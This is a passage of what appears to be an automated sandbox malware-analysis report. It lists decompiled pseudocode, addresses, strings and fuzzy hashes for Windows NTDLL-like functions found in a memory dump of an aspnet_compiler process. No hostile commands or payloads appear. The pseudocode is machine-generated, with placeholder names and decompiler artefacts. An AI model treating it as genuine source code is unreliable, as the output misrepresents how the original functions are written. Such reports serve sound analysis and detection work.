				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x133d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01280BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E012C3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0128FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E012C3540;
						E0128FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0129DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E012D0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E012897C0();
					}
					return E0128B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E012C3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E012C3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0128FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01289650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E012C3787(_a4,  &_v352, _t80);
						}
					}
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E012895D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x012c3552
0x012c355a
0x012c355d
0x012c3566
0x012c3567
0x012c357e
0x012c358f
0x012c35a1
0x012c35a5
0x012c366b
0x012c366b
0x012c366d
0x012c3672
0x012c3679
0x012c3685
0x012c368d
0x012c369d
0x012c36a7
0x012c36b8
0x012c36c6
0x012c36c7
0x012c36dc
0x012c36e1
0x012c36e7
0x012c36e9
0x012c36e9
0x012c3703
0x012c3703
0x012c35b5
0x012c35c0
0x012c35c4
0x00000000
0x00000000
0x012c35ca
0x012c35d7
0x012c35e2
0x012c35e6
0x012c35e8
0x012c35f5
0x012c35fa
0x012c3603
0x012c3604
0x012c3609
0x012c360a
0x012c3612
0x012c3613
0x012c361e
0x012c3622
0x012c3628
0x012c362f
0x012c362f
0x012c3636
0x012c3638
0x012c363b
0x012c3642
0x012c3642
0x012c3636
0x012c3657
0x012c3657
0x012c365c
0x012c3662
0x012c3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 012C358F

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: fae951b51eafd901d879655092c141f82c1e73634760d9e96b3d3b9b3cc95e9d
Instruction ID: 60224d0b46cd4e69e9476267f85a5c0807495fcb027fe5ef4aa0b50742a42411
Opcode Fuzzy Hash: fae951b51eafd901d879655092c141f82c1e73634760d9e96b3d3b9b3cc95e9d
Instruction Fuzzy Hash: 584125B1D1152D9FDB21DA50CC80FEEB77CAB54714F1086A9E709A7241DB309E88CF98

Uniqueness

Uniqueness Score: -1.00%

Function 013105AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E013105AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E013107DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01289730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0130A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0130A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01311293(_t79, _v40, E013107DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01267D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0130138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x013105c5
0x013105ca
0x013105d3
0x013106db
0x013106db
0x013106dd
0x013106e3
0x013106e3
0x013105dd
0x013105e7
0x013105f6
0x01310600
0x01310607
0x01310610
0x01310615
0x0131061a
0x0131061c
0x0131061e
0x01310624
0x01310625
0x01310627
0x01310628
0x01310631
0x01310640
0x0131064d
0x01310654
0x01310654
0x01310631
0x0131066d
0x01310674
0x00000000
0x00000000
0x01310692
0x0131069e
0x013106b0
0x013106a0
0x013106a9
0x013106a9
0x013106b8
0x013106d6
0x013106d6
0x00000000

Strings

`, xrefs: 01310633

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 443a7871eb51b1c571a69db6e17c63a5773ad84416b6552eeb88faad435130c3
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: CF31E2322043066BE718DE28CC44F967BD9EB84768F144629FA54EB2C4D670E944C791

Uniqueness

Uniqueness Score: -1.00%

Function 012C3884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E012C3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01289650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01264620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01289650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x012c3893
0x012c3896
0x012c3899
0x012c389f
0x012c38a0
0x012c38a4
0x012c38a9
0x012c38ac
0x012c38ad
0x012c38ae
0x012c38af
0x012c38b1
0x012c38b4
0x012c38bb
0x012c38bc
0x012c38bd
0x012c38c4
0x012c38c8
0x012c38ca
0x012c38ca
0x012c38d5
0x012c393e
0x012c3940
0x012c3942
0x012c3952
0x012c3954
0x012c3961
0x012c3961
0x012c3967
0x012c396e
0x012c396e
0x012c3947
0x012c394c
0x00000000
0x012c394c
0x012c38ea
0x012c38ee
0x012c38f8
0x012c38f9
0x012c38ff
0x012c3900
0x012c3902
0x012c3903
0x012c390b
0x012c390f
0x012c3950
0x00000000
0x012c3950
0x012c3915
0x012c391d
0x012c391d
0x012c3922
0x012c3926
0x00000000
0x012c3928
0x012c392b
0x012c392b
0x012c3935
0x012c3937
0x012c3937
0x00000000
0x012c3935
0x012c3926
0x012c38f0
0x00000000

Strings

BinaryName, xrefs: 012C38B4

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: c137dae90e228f495822522a3d7f1c3e0836d3be3c695d3b8ca0930e1fb7164f
Instruction ID: fec9c818116fcde670d7b514c4df39074a87893f9de3c2f74e4b59deed48407c
Opcode Fuzzy Hash: c137dae90e228f495822522a3d7f1c3e0836d3be3c695d3b8ca0930e1fb7164f
Instruction Fuzzy Hash: F431E53291151AEFDB15DA58C945DBFBB74FB80B20F01866DEB15A7290D7309E40C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0127D294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0127D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x133d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01264120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0128B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E012898D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E012895D0();
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0127d29c
0x0127d2a6
0x0127d2b1
0x0127d2b5
0x0127d2b6
0x0127d2bc
0x0127d2bd
0x0127d2be
0x0127d2bf
0x0127d2c2
0x0127d2c4
0x0127d2cc
0x0127d384
0x0127d34b
0x0127d34f
0x0127d350
0x0127d351
0x0127d35c
0x0127d35c
0x0127d2d6
0x0127d2da
0x0127d2e1
0x0127d361
0x0127d369
0x0127d36d
0x0127d2e3
0x0127d2e3
0x0127d2e3
0x0127d2e5
0x0127d2ed
0x0127d2f5
0x0127d2fa
0x0127d302
0x0127d303
0x0127d30b
0x0127d30f
0x0127d313
0x0127d318
0x0127d31c
0x0127d320
0x0127d379
0x0127d37d
0x00000000
0x00000000
0x012baffe
0x012bb001
0x012bb011
0x00000000
0x0127d322
0x0127d322
0x0127d330
0x0127d337
0x0127d35d
0x0127d339
0x0127d33f
0x0127d38c
0x0127d38c
0x0127d33f
0x0127d349
0x00000000
0x0127d349

Strings

@, xrefs: 0127D303

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9530731e789499f5e0de6da9109ea8161316e175af081a564a0486a8ec3cea3e
Instruction ID: f7504a33ecf0f2e065aff9310605b9fee429fe76b9b6456a6b2e6d62d6273445
Opcode Fuzzy Hash: 9530731e789499f5e0de6da9109ea8161316e175af081a564a0486a8ec3cea3e
Instruction Fuzzy Hash: DE31C2B156930A9FC711DF68C881AABBBE8EFC5754F00092EF99583250D634ED44CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 01251B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01251B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0128BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0128A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0128A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01264620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x01251b8f
0x01251b9a
0x01251b9c
0x01251b9e
0x01251ba3
0x012a7010
0x012a7010
0x00000000
0x01251ba9
0x01251ba9
0x01251bae
0x00000000
0x01251bc5
0x01251bca
0x01251bcf
0x01251bd0
0x01251bd1
0x01251bd2
0x01251bd6
0x01251bdc
0x01251be0
0x012a6ffc
0x012a7000
0x00000000
0x012a7006
0x012a7009
0x012a7009
0x01251be6
0x01251bec
0x01251c0b
0x01251c0b
0x01251c0c
0x01251c11
0x01251c12
0x01251c15
0x01251c1b
0x01251c1f
0x01251c31
0x01251c33
0x012a7026
0x012a7026
0x01251c21
0x01251c24
0x01251c24
0x01251bee
0x01251bee
0x01251bf2
0x01251c3a
0x01251bf4
0x01251bf4
0x01251c05
0x01251c05
0x01251c09
0x01251c3e
0x00000000
0x00000000
0x00000000
0x01251c09
0x01251bec
0x01251be0
0x01251bae
0x01251c2e

Strings

WindowsExcludedProcs, xrefs: 01251BC5

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: c194b31cef1393fe0c6deca75963e01813a35bf9ea7eb84cf019fc5c0341dfba
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: CF21073A57122AABDB629A59C8C0F6FBBADEF41B51F054425FF049B200D636DC10C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0126F716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0126F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0126f71d
0x0126f722
0x0126f726
0x012b4770
0x0126f765
0x0126f769
0x0126f769
0x0126f732
0x012b477a
0x00000000
0x012b477a
0x0126f738
0x0126f73a
0x0126f73c
0x0126f73f
0x0126f746
0x0126f778
0x0126f7a9
0x0126f7a9
0x0126f754
0x0126f75a
0x0126f75d
0x0126f75f
0x0126f761
0x0126f76f
0x0126f771
0x0126f771
0x0126f76f
0x0126f763
0x00000000
0x0126f763
0x0126f77d
0x0126f7a3
0x0126f7a5
0x00000000
0x0126f7a5
0x0126f77f
0x0126f782
0x0126f784
0x0126f786
0x00000000
0x00000000
0x00000000
0x0126f788
0x0126f748
0x0126f74d
0x0126f78d
0x0126f793
0x0126f7b7
0x0126f7bc
0x00000000
0x0126f7bc
0x0126f798
0x00000000
0x00000000
0x0126f79d
0x0126f7b0
0x00000000
0x0126f7b0
0x0126f79f
0x00000000
0x0126f74f
0x0126f74f
0x00000000
0x0126f74f

Strings

Actx , xrefs: 0126F73F

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 5bc44855a25bdcc80522c0f57bce9eecfb00fa4255c65d16c820a32ab6f6d01a
Instruction ID: 5f4945003348198410177b3fb96615c828c0346527267d7aa7cb9739cb8e6c79
Opcode Fuzzy Hash: 5bc44855a25bdcc80522c0f57bce9eecfb00fa4255c65d16c820a32ab6f6d01a
Instruction Fuzzy Hash: 4E1184353347038BEF2F4D1DABB2675769DAB95654F24452AD661CB3D1DAB8C8C0C340

Uniqueness

Uniqueness Score: -1.00%

Function 012F8DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E012F8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1320d50);
				E0129D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E012D5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0129DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0129DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0129D130(_t34, _t39, _t40);
			}

0x012f8df1
0x012f8df1
0x012f8df1
0x012f8df1
0x012f8df1
0x012f8df1
0x012f8df3
0x012f8df8
0x012f8dfd
0x012f8e00
0x012f8e0e
0x012f8e2a
0x012f8e36
0x012f8e38
0x012f8e3c
0x012f8e46
0x012f8e46
0x012f8e36
0x012f8e50
0x012f8e56
0x012f8e59
0x012f8e5c
0x012f8e60
0x012f8e67
0x012f8e6d
0x012f8e73
0x012f8e74
0x012f8eb1
0x012f8ebd

Strings

Critical error detected %lx, xrefs: 012F8E21

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 656de013c613ab973ff22c3927f283883bd13460af385a0feee9150e47d9bfbb
Instruction ID: e1cb0cba2a34ac29b20416913fbac52d9fe4bb851433a36192e3b925697dcd65
Opcode Fuzzy Hash: 656de013c613ab973ff22c3927f283883bd13460af385a0feee9150e47d9bfbb
Instruction Fuzzy Hash: 53115BB5D25349DBDF29DFA886067ACFBB0BB14314F20426DE669AB292C3740602DF14

Uniqueness

Uniqueness Score: -1.00%

Function 012DFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 012DFF60

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: e8375731c023041f58cd0df95ba5150a176427c055898cf3fe3ea5fcd24ca234
Instruction ID: e55172d17fa21f23953cf357333bf34c4c35dfa670b59e7c4c1e7d8e2c1cd835
Opcode Fuzzy Hash: e8375731c023041f58cd0df95ba5150a176427c055898cf3fe3ea5fcd24ca234
Instruction Fuzzy Hash: CB110471930149EFDF26DF54CA49FA8BBB1FF04704F148084E205572A1C7389940DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01315BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E01315BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1321178);
				E0129D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01314C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0128D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01315542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
